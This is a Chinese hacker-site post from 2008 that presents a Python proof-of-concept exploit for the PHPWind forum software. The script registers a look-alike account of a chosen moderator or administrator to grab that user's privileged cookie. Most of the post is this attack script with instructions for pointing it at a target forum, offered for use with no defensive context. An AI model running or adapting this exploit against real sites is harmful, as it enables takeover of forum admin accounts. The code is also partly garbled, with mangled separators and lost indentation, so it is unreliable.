首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 漏洞利用

PHPWIND最新通杀漏洞!08-6-1


http://www.gipsky.com/
儿童节日快乐~!

PHPWIND,用户,注册,提权 ,以后弄GUI版本的.

用ActivePython,把文件保存成 phpwind.py

[code]# -*- coding: gb2312 -*-

import urllib2,httplib,sys

httplib.HTTPConnection.debuglevel = 1

cookies = urllib2.HTTPCookieProcessor()

opener = urllib2.build_opener(cookies)





def banner():

print ""

print "########################################################"

print "Phpwind所有版本管理权限泄露漏洞利用poc"

print "Copyright (C) 2008"

print "www.winshell.cn"

print "坏狼安全网,服务器安全,网站安全,漏洞修复!"



def usage():

banner()

print "BADWOLF提示使用方法:"

print "Usage:\n"

print " $ ./phpwind.py pwforumurl usertoattack\n"

print " pwforumurl 目标论坛地址如http://www.phpwind.com/"

print " usertoattack 目标拥有权限的斑竹或管理员"

print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"

print " 最新版本可以使用uid登陆"

print " 其他版本可以使用cookie useragent登陆"

print "########################################################"

print ""





argvs=sys.argv

usage()





data = "regname=%s%s1?pwd=@winshell?pwdrepeat=@winshell?email=foo@foo.com?emailtoall=1&step=2" % (argvs[2],"?")

pwurl = "%s/register.php" % argvs[1]



request = urllib2.Request(

url = pwurl ,

headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': 'winshell owned this'},

data = data)



f=opener.open(request)

headers=f.headers.dict

cookie=headers["set-cookie"]

try:

if cookie.index('winduser'):

print "Exploit Success!"

print "Login with uid password @winshell or Cookie:"

print cookie

print "User-agent: badwolf owned this"

except:

print "Error! http://www.winshell.cn"

print "Connect root#winshell.com"[/code]
Tags: phpwind , 用户 , 注册 , 提权[/code]
[/code]
<< 坏狼安全网PHP专用webshell. 最近看电视听到三个比较好听的歌曲~ >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号